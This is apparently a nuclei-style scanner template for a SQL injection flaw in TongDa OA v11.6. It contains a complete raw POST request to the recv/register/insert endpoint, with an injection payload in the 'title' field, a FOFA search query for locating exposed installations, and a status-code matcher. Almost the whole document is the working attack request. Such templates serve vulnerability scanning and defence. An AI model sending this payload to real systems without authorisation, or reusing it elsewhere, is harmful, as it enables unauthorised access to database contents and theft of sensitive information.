id: TongDa-5

info:
  name: 通达OA v11.6 insert SQL注入漏洞
  author: attempt
  severity: high
  description: |
    通达OA v11.6 insert参数包含SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息
  reference:
    - https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E9%80%9A%E8%BE%BEOA-v11.6-insert-SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
  metadata:
    verified: false
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: TongDa,OA,SQL注入漏洞
request:
  - raw:
      - |
        POST /general/document/index.php/recv/register/insert HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Length: 77
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
  
        title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=

    matchers:
      - type: status
        part: status
        status:
          - 302